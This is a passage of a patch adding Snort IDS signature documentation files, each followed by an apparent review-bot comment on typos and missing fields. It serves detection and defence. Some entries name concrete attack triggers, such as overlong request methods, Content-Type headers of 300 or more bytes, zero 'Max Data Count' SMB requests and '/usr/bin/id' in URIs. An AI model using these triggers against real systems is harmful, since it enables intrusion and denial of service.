+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
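Review bot: "A vulnerability exists in in Freespace 2" has a doubled "in". "Affected Systems:" gives only the product name with no version, so an analyst cannot tell whether the "latest non-affected version" named in Corrective Action has been reached; add the affected and fixed versions, and a vendor or advisory link under the empty "Additional References:".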
--- /dev/null
+++ b/doc/signatures/605.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 605
+
+--
+Summary: 
+This event is generated when a remote login attempt using rlogin fails.
+
+--
+Impact: 
+Someone has tried to login using rlogin and failed
+
+-- 
+Detailed Information: 
+This rule generates an event when a login failure message generated by rlogind is seen. rlogin is used on UNIX systems for remote connectivity and remote command execution.  
+
+Multiple events may indicate that an attacker is attempting a brute force password guessing attack.
+
+--
+Attack Scenarios: 
+An attacker finds a machine with rlogin service running and proceeds to guess the password remotely by connecting multiple times.
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+A legitimate user may generate an event by entering an incorrect password.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0651
+
+Arachnids:
+http://www.whitehats.com/info/IDS393
+
+--
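Review bot: The "Affected Systems:" section that every other entry carries is missing from this file; add it (UNIX systems running rlogind, which Detailed Information already names) so the file follows the common template. "Simple, no exploit software required" and "Someone has tried to login using rlogin and failed" lack terminating periods, and "login" used as a verb should be "log in".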
--- /dev/null
+++ b/doc/signatures/2555.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2555
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
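Review bot: The version strings under Affected Systems are broken by stray spaces ("10g 9.0.4 .0", "2.0 .0.4", "9.0.2 .3", "9.0.2 .2", "9.0.3 .1"), presumably 9.0.4.0, 2.0.0.4, 9.0.2.3, 9.0.2.2 and 9.0.3.1; remove the spaces so they can be matched against installed versions. The False Negatives section gives the port caveat (7777 or 7778) an operator needs, but "Additional References:" is empty although Corrective Action relies on a vendor patch; add the Oracle alert reference.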
--- /dev/null
+++ b/doc/signatures/1693.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1693
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
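Review bot: The sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit." does not fit an Oracle database rule and appears carried over from a telnet signature; remove it. The $ORACLE_PORTS guidance is given twice (in Detailed Information and again, more fully, in False Negatives); keep the False Negatives text and drop the duplicate. "Attack Scenarios: Simple. These are Oracle database commands." describes ease rather than a scenario; describe how the command reaches the server instead. Also, as in the 605 entry, the "Affected Systems:" section is missing.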
--- /dev/null
+++ b/doc/signatures/1801.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1801
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
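Review bot: Like the 1086 and 1744 entries, the Summary says "a known vulnerability" without naming it and Detailed Information only says "Many known vulnerabilities exist for this platform"; state which IIS request pattern sid 1801 matches so the event can be triaged. "the attackers choosing" should be "the attacker's choosing".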
--- /dev/null
+++ b/doc/signatures/2440.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2440
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Real Networks RealPlayer/RealOne player.
+
+--
+Impact:
+Serious. Execution of arbitrary code.
+
+--
+Detailed Information:
+RealNetworks RealPlayer/RealOne player is a streaming media player for
+Microsoft Windows, Apple Macintosh and UNIX/Linux based operating systems.
+
+A buffer overrun condition is present in some versions of the player
+that may present a remote attacker with the opportunity to execute code
+of their choosing on a client using one of these players.
+
+--
+Affected Systems:
+	Real Networks RealOne Desktop Manager
+	Real Networks RealOne Enterprise Desktop 6.0.11 .774
+	Real Networks RealOne Player 1.0
+	Real Networks RealOne Player 2.0
+	Real Networks RealOne Player 6.0.11 .868
+	Real Networks RealOne Player version 2.0 for Windows
+	Real Networks RealPlayer 8.0 Win32
+	Real Networks RealPlayer 8.0 Unix
+	Real Networks RealPlayer 8.0 Mac
+	Real Networks RealPlayer 10.0 BETA
+
+--
+Attack Scenarios:
+An attacker may supply a malformed file to the client to exploit the
+issue.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
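Review bot: Two Affected Systems entries have version strings broken by spaces ("6.0.11 .774" and "6.0.11 .868"), presumably 6.0.11.774 and 6.0.11.868; fix them so they match the version strings the player reports. The vendor is written both "RealNetworks" and "Real Networks" in the same file; use one spelling. "Additional References:" is empty although Corrective Action depends on identifying the "latest non-affected version".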
--- /dev/null
+++ b/doc/signatures/2067.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2067
+
+--
+Summary:
+file on a Lotus Domino Server.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+Certain versions of Lotus Domino web servers do not correctly handle 
+requests for script files not specific to Lotus Domino.
+
+By using a dot in the filename an attacker may view the source of the 
+script and be presented with sensitive information embedded in the 
+script.
+
+--
+Affected Systems:
+Lotus Domino Server 5.0 and 6.0
+
+--
+Attack Scenarios:
+The attacker merely needs to make an HTTP request for the script and add
+a dot to the filename. This can be done using a browser.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+The HotSaNIC (hotsanic.sourceforge.net) System and Network Info Centre
+can graph the occurence of worm attacks on a server against time. The
+HotSaNIC system displays 'WEB-MISC Lotus Notes .exe script source
+download attempt' type attacks in an image file called
+thumb-root.exe.gif. Each time this image is accessed it generates an
+event.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor fixes
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+False positive information contributed by Chris McMahon <chris@mcmahon.co.uk>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/6841
+
+--
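Review bot: The Summary is truncated: it reads only "file on a Lotus Domino Server." and the start of the sentence is missing. It should describe the event, namely an attempt to download the source of a script file on a Lotus Domino server, which is what Detailed Information and the alert name quoted in False Positives ("WEB-MISC Lotus Notes .exe script source download attempt") describe. Also "occurence" should be "occurrence", and "Bugtraq" in Additional References is missing the colon the other entries use.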
--- /dev/null
+++ b/doc/signatures/2956.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2956
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
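Review bot: Detailed Information says the NetDDE service "is not started by default" and that the issue "can also be exploited locally in an attempt to escalate privileges", but Corrective Action only says "Disable the NetDDE service."; phrase it as verifying that the service remains disabled and is not set to start automatically, since the local escalation path matters even on hosts where the network rule never fires. The Impact line also lacks a terminating period.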
--- /dev/null
+++ b/doc/signatures/100000795.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000795
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "bg" parameter in the "blogroll.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
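Review bot: the Impact and Detailed Information sections describe server-side consequences ("Possible execution of arbitrary code of the attackers choosing", "execute system binaries or malicious code") that do not follow from the cross site scripting bug in the "bg" parameter of "blogroll.php" that the Summary describes; suggest stating the client-side impact instead (script execution in the victim's browser, theft of session cookies, injection of content into the rendered page), which also matches the Attack Scenarios text about a malicious link. Style: the Sid, Affected Systems and Contributors blocks are missing the blank line before "--" that the other files in this set use, "attackers choosing" should be "attacker's choosing", and the two leading blank lines before "Rule:" should be dropped.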
--- /dev/null
+++ b/doc/signatures/1914.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1916
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a format
+string vulnerability associated with the Remote Procedure Call (RPC)
+rpc.statd.
+
+--
+Impact:
+Remote root access. This may permit execution of arbitrary commands with
+the privileges of root.
+
+--
+Detailed Information:
+The rpc.statd daemon is a component of Network File System (NFS) that
+implements the Network Status and Monitor (NSM) RPC functions.  NSM
+monitors the status of NFS clients and servers and maintains a list of
+hosts that have registered to be notified when an NFS host crashes. 
+There is a format string vulnerability associated with the code that
+implements the monitoring of a given host, possibly permitting the
+execution of arbitrary commands with the privileges of root. 
+
+--
+Affected Systems:
+	Conectiva Linux 4.0, 4.1, 4.2, 5.0, 5.1
+	Debian Linux 2.2, 2.3
+	Red Hat Linux 6.0, 6.1, 6.2
+	SuSE Linux 6.3, 6.4, 7.0
+	Trustix Secure Linux 1.0, 1.1
+
+--
+Attack Scenarios:
+An attacker can attempt to exploit the format string error allowing
+execution of arbitrary commands with the privileges of root.  
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
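Review bot: the Sid field reads "1916" but the file is doc/signatures/1914.txt; one of the two is wrong, and a mismatch means the lookup from rule sid to documentation fails, so check which sid the rule file actually carries and correct the other. Additional References is empty although the text describes a widely documented rpc.statd format string bug and Affected Systems lists five distributions by version; citing the vendor advisories for those releases would make "Limit remote access to RPC services" actionable. Minor: "None Known." should be "None known." for consistency with the rest of the set, and several lines ("hosts that have registered to be notified when an NFS host crashes. ", "Simple. Exploit code is freely available. ") carry trailing whitespace.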
--- /dev/null
+++ b/doc/signatures/1053.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1053
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
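Review bot: the Detailed Information block is generic CGI boilerplate and never says which application, script or request pattern sid 1053 actually matches, so an analyst reading the alert cannot tell what was requested or which vendor patch "Ensure the system is using an up to date version of the software" refers to; name the targeted CGI script in the Summary or Detailed Information. Typos: "running ona web server" should read "running on a web server", and "attackers choosing" should be "attacker's choosing".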
--- /dev/null
+++ b/doc/signatures/100000356.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000356
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BASE" application running on a webserver. Access to the file "base_qry_common.php" using a remote file being passed as the "BASE_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "BASE_path" parameter in the "base_qry_common.php" script used by the "BASE" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BASE
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
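Review bot: the third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials ...") and the Attack Scenarios text about supplying credentials to an authentication mechanism are copied from the generic CGI template and do not describe a remote file include; replace them with the include scenario the Summary already gives, that a URL supplied as the "BASE_path" parameter to "base_qry_common.php" causes the application to include and execute a file fetched from the remote host. Also fix "running ona web server", drop the two leading blank lines before "Rule:", and consider adding the BASE advisory to the empty Additional References section.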
--- /dev/null
+++ b/doc/signatures/1332.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+1332
+
+--
+Summary:
+Attempted id command access via web
+
+--
+Impact:
+Attempt to gain information on users and groups that exist on the host
+using the id command.
+
+--
+Detailed Information:
+This is an attempt to gain intelligence about the users on a host. "id"
+is a UNIX command that will return information about the system's users
+and groups. This information is valuable to an attacker who can use it
+to plan further attacks based on the users possible login information or
+be more effective in targeting specific users and groups who possess
+elevated privileges . The id command will return information on the
+user, the groups the user belings to and the users' "gid" and "uid".
+
+The rule looks for the "id" command in the client to web server network
+traffic and does not indicate whether the command was actually
+successful in showing the user information. The presence of the "id"
+command web traffic indicates that an attacker attempted to trick the
+web server into executing system in non-interactive mode i.e. without a
+valid shell session. 
+
+Alternatively this rule may trigger in an unencrypted HTTP tunneling
+connection to the server or a shell connection via another exploit
+against the web server.
+
+--
+Attack Scenarios:
+1. The attacker can make a standard HTTP request that contains
+'/usr/bin/id' in the URI which can then return sensitive information on
+groups and users present on the host. 
+
+2. This command may also be requested on a command line should the
+attacker gain access to the machine.
+
+3. An attacker uses a "id" command via a web server connection to test
+what username the web server runs under. He then looks for all the files
+writable by this user and find a web server configuration file with
+wrong permissions.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it's designated web root or cgi-bin. 
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+sid: 1333
+
+man id
+
+--
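Review bot: this file has no Affected Systems section, unlike the other documents in this patch; add one (web servers running CGI scripts on UNIX hosts, where the "/usr/bin/id" path named in Attack Scenarios exists). In Detailed Information, "the groups the user belings to" should be "belongs to", "elevated privileges ." has a stray space, and "trick the web server into executing system in non-interactive mode" is missing a word (presumably "system commands"). In Attack Scenarios, "uses a "id" command" should be "an "id" command" and "and find a web server configuration file" should be "finds"; in Corrective Action, "outside of it's designated web root" should be "its". The Contributors separator line "-- " has trailing whitespace.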
--- /dev/null
+++ b/doc/signatures/371.txt
@@ -0,0 +1,55 @@
+Rule:
+--
+Sid:
+371
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Cisco IOS 9.x system.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a system running Cisco IOS 9.x contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS153
+
+--
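Review bot: "An ICMP echo request may be used to legimately troubleshoot networking problems." should read "legitimately", and the Contributors line "Documented by Steven Alexander<alexander.s@mccd.edu>" is missing a space before the address. The blank line between "Rule:" and "--" that the other files use is missing here. Since the False Positives section itself says echo requests are used for legitimate troubleshooting, the Corrective Action "Block inbound ICMP echo requests." could add that the rule's value lies in the IOS 9.x payload fingerprint described in Detailed Information, so logging or rate-limiting echo requests at the perimeter is the alternative where ping must stay available.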
--- /dev/null
+++ b/doc/signatures/100000118.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+100000118
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a buffer overflow 
+present in Internet Explorer's urlmon.dll file.
+
+-- 
+
+Impact: 
+An attacker may execute arbitrary commands with the privileges of the user 
+running Internet Explorer.
+
+--
+Detailed Information:
+If a web server sends data with a Content-Type value of 300 or more bytes, a 
+buffer overflow is triggered, and commands may be executed with the privileges 
+of the user running Internet Explorer.
+
+--
+Affected Systems:
+Internet Explorer 5.0.1
+Internet Explorer 5.0.1 SP1
+Internet Explorer 5.0.1 SP2
+Internet Explorer 5.0.1 SP3
+Internet Explorer 5.5
+Internet Explorer 5.5 SP1
+Internet Explorer 5.5 SP2
+Internet Explorer 6.0
+Internet Explorer 6.0 SP1
+
+--
+
+Attack Scenarios: 
+An attacker must entice a user to click on a link to a properly configured 
+server, which will return the necessary data.
+
+-- 
+
+Ease of Attack: 
+Medium. An attacker must control a properly configured web server, and entice 
+users to click on a link to that server.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Apply the latest patches for Internet Explorer from Microsoft.com.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
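Review bot: Additional References is empty although the Summary and Detailed Information describe a specific urlmon.dll buffer overflow (a Content-Type value of 300 or more bytes) with a precise list of affected Internet Explorer versions; the Microsoft bulletin that fixes it should be cited so that "Apply the latest patches for Internet Explorer from Microsoft.com" is actionable. Elsewhere in this patch, 3462.txt documents the same urlmon.dll overflow triggered through the Content-Encoding header; a cross-reference in the "sid: 1333" style used in 1332.txt would help analysts correlate the two events. The stray blank lines after the "--" separators before "Impact:", "Attack Scenarios:", "Ease of Attack:" and "Corrective Action:" are inconsistent with the rest of the set.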
--- /dev/null
+++ b/doc/signatures/486.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+
+Sid:
+486
+
+--
+
+Summary:
+This event is generated when an ICMP destination unreachable
+(Communication with Destination Host is Administratively Prohibited)
+datagram is detected on the network.  
+
+--
+
+Impact:
+This message is generated when a datagram failed to traverse the
+network.  This could be an indication of routing or network problems.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large
+numbers of these messages on the network could indication routing
+problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None known.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+This rule detects informational network information, so no corrective
+action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None.
+
+
+--
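Review bot: in Detailed Information, "Large numbers of these messages on the network could indication routing problems" should read "could indicate". The Ease of Attack text ("Numerous tools and scripts can generate these types of ICMP datagrams.") sits oddly under "Attack Scenarios: None known."; if forged administratively-prohibited messages are a concern (for instance to disrupt reachability), say so in Attack Scenarios, otherwise "Not applicable" would be clearer than describing tooling. The doubled blank line after "Additional References: None." should be a single one.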
--- /dev/null
+++ b/doc/signatures/2102.txt
@@ -0,0 +1,81 @@
+Rule:  
+
+--
+Sid: 2102
+
+--
+Summary:
+
+A buffer overflow exists in the SMB (Server Message Block) Protocol 
+implementation in Microsfot Windows NT, Windows 2000, and Windows XP 
+that allows attackers to cause a denial of service via a NetShareEnum 
+request.
+
+This rule has been deprecated due to an inordinately large number of 
+false positives. Rule 2101 has been modified to take this into account.
+
+--
+Impact:
+
+An attacker can cause the target system to lock up and require manual
+reboot.  With more research, an attacker may be able to exploit this
+buffer overflow and execute arbitrary code, but this research has not
+been made public at this time.
+
+--
+Detailed Information:
+
+SMB on a vulnerable system may crash if it recieves a specially crafted
+packet containing a NetServerEnum, NetServerEnum2, or NetServerEnum3 
+transaction request.  If either the paramaters "Max Parameter Count" or
+"Max Data Count" are set to 0, then a vulnerable system will crash.  
+NetServerEnum requests require an authorized user account, however 
+NetServerEnum2 and NetServerEnum3 require anonymous access.  Anonymous
+access is enabled by default.  This signature looks for a "Max Data Count" 
+set to 0.
+
+--
+Attack Scenarios:
+
+An attacker would use one of the various publicly available tools to launch
+this attack.
+
+--
+Ease of Attack:
+
+Numerous tools, including a windows binary (SMBDie.exe), have been made
+publicly availablet exploit the denial of service portion of this vulnerability.
+
+--
+False Positives:
+
+This rule may trigger on functions other than NetServerEnum, NetServerEnum2,
+or NetServerEnum3.  Because a SMB decoder is not available in Snort at this time,
+verifying that the function that is being called is not feasable.
+
+--
+False Negatives:
+
+No false negatives are known at this time.
+
+--
+Corrective Action:
+
+Install the patches available from Microsoft.  The patches are listed in
+Microsoft's advisory for this vulnerability.
+
+www.microsoft.com/technet/security/bulletin/MS02-045.asp
+
+--
+Contributors:
+
+Brian Caswell <bmc@snort.org>
+
+-- 
+Additional References:
+
+cve,CAN-2002-0724
+url,www.microsoft.com/technet/security/bulletin/MS02-045.asp; 
+url,www.corest.com/common/showdoc.php?idx=262; 
+
+--
